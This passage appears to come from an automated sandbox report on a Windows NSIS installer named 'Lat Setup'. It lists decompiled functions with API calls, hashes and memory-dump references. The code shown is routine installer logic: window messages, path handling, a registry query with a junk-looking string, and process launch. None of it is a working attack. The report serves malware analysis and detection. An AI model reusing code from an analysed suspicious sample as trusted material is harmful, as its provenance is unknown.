                                                                        • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                        0x00401c2e
                                                                        0x00401c30
                                                                        0x00401c37
                                                                        0x00401c3a
                                                                        0x00401c3d
                                                                        0x00401c47
                                                                        0x00401c4b
                                                                        0x00401c4e
                                                                        0x00401c57
                                                                        0x00401c57
                                                                        0x00401c5a
                                                                        0x00401c5e
                                                                        0x00401c67
                                                                        0x00401c67
                                                                        0x00401c6a
                                                                        0x00401c6e
                                                                        0x00401c70
                                                                        0x00401cc5
                                                                        0x00401cc7
                                                                        0x00401cd0
                                                                        0x00401cd8
                                                                        0x00401cdb
                                                                        0x00401cdb
                                                                        0x00401ce4
                                                                        0x00000000
                                                                        0x00401c72
                                                                        0x00401c79
                                                                        0x00401c7b
                                                                        0x00401c7e
                                                                        0x00401c84
                                                                        0x00401c8b
                                                                        0x00401c8e
                                                                        0x00401cb6
                                                                        0x00401cea
                                                                        0x00401cea
                                                                        0x00401c90
                                                                        0x00401c9e
                                                                        0x00401ca6
                                                                        0x00401ca9
                                                                        0x00401ca9
                                                                        0x00401c8e
                                                                        0x00401ced
                                                                        0x00401cf0
                                                                        0x00401cf6
                                                                        0x004029a5
                                                                        0x004029a5
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                        • SendMessageA.USER32 ref: 00401CB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                        • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                        • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                        • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004049C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}



















                                                                        0x004049ca
                                                                        0x004049cf
                                                                        0x004049d7
                                                                        0x004049d8
                                                                        0x004049e5
                                                                        0x004049ed
                                                                        0x004049ee
                                                                        0x004049f0
                                                                        0x004049f2
                                                                        0x004049f4
                                                                        0x004049f7
                                                                        0x004049f7
                                                                        0x004049fe
                                                                        0x00404a04
                                                                        0x00404a04
                                                                        0x00404a0b
                                                                        0x00404a12
                                                                        0x00404a15
                                                                        0x00404a18
                                                                        0x00404a18
                                                                        0x00404a1c
                                                                        0x00404a2c
                                                                        0x00404a2e
                                                                        0x00404a31
                                                                        0x004049da
                                                                        0x004049da
                                                                        0x004049e1
                                                                        0x004049e1
                                                                        0x00404a39
                                                                        0x00404a44
                                                                        0x00404a5a
                                                                        0x00404a6a
                                                                        0x00404a86

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                        • wsprintfA.USER32 ref: 00404A6A
                                                                        • SetDlgItemTextA.USER32 ref: 00404A7D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                        • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                        • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                        • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                        0x00405a90
                                                                        0x00405aa7
                                                                        0x00405aaf
                                                                        0x00405aaf
                                                                        0x00405ab7

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-823278215
                                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                        • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                        • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x429448 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}






                                                                        0x00402e44
                                                                        0x00402e64
                                                                        0x00402e6e
                                                                        0x00402e7a
                                                                        0x00402e8b
                                                                        0x00402e94
                                                                        0x00000000
                                                                        0x00402e99
                                                                        0x00402ea0
                                                                        0x00402e66
                                                                        0x00402e6d
                                                                        0x00402e6d
                                                                        0x00402e46
                                                                        0x00402e46
                                                                        0x00402e4d
                                                                        0x00402e50
                                                                        0x00402e50
                                                                        0x00402e56
                                                                        0x00402e5d
                                                                        0x00402e5d

                                                                        APIs
                                                                        • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                                        • GetTickCount.KERNEL32 ref: 00402E6E
                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                        • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                        • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                        • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                        0x00405b89
                                                                        0x00405b94
                                                                        0x00405b98
                                                                        0x00405b9f
                                                                        0x00405bab
                                                                        0x00405bb7
                                                                        0x00405bb7
                                                                        0x00405bcf
                                                                        0x00405bd0
                                                                        0x00405bd7
                                                                        0x00405bd8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405bbb
                                                                        0x00405bc2
                                                                        0x00405bca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405bc2
                                                                        0x00405bda
                                                                        0x00000000
                                                                        0x00405bee
                                                                        0x00405bad
                                                                        0x00405bb1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405bb1
                                                                        0x00405b9a
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Lat Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                        • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                        • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-823278215
                                                                        • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                        • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                        • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                        • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a87c = _t16;
							E00404B4E();
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041C7(0x413);
				return 0;
			}





                                                                        0x00405196
                                                                        0x004051a0
                                                                        0x004051bc
                                                                        0x004051de
                                                                        0x004051e1
                                                                        0x004051e7
                                                                        0x004051f1
                                                                        0x004051f2
                                                                        0x004051f4
                                                                        0x004051fa
                                                                        0x004051fa
                                                                        0x00405204
                                                                        0x00000000
                                                                        0x00405212
                                                                        0x004051c9
                                                                        0x00405201
                                                                        0x00405201
                                                                        0x00000000
                                                                        0x00405201
                                                                        0x004051d5
                                                                        0x004051d7
                                                                        0x00000000
                                                                        0x004051d7
                                                                        0x004051a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004051ad
                                                                        0x00000000

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 004051C1
                                                                        • CallWindowProcA.USER32 ref: 00405212
                                                                          • Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                        • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                        • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                        • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                        0x00405fec
                                                                        0x00405fee
                                                                        0x00406006
                                                                        0x0040600b
                                                                        0x00406010
                                                                        0x0040604d
                                                                        0x0040604d
                                                                        0x00406012
                                                                        0x00406024
                                                                        0x0040602f
                                                                        0x00406035
                                                                        0x0040603f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040603f
                                                                        0x00406052

                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,GHFGHFGHFDGDFGDFg,0042A070,?,?,?,00000002,GHFGHFGHFDGDFGDFg,?,00406293,80000002), ref: 00406024
                                                                        • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,?,0042A070), ref: 0040602F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: GHFGHFGHFDGDFGDFg
                                                                        • API String ID: 3356406503-2848008697
                                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                        • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                        • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                        0x0040579f
                                                                        0x004057bf
                                                                        0x004057c7
                                                                        0x004057cc
                                                                        0x00000000
                                                                        0x004057d2
                                                                        0x004057d6

                                                                        APIs
                                                                        Strings
                                                                        • Error launching installer, xrefs: 004057A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                        • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                        • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                        • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854;
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}







                                                                        0x00403876
                                                                        0x0040387e
                                                                        0x00403885
                                                                        0x00403888
                                                                        0x00403888
                                                                        0x0040388a
                                                                        0x0040388f
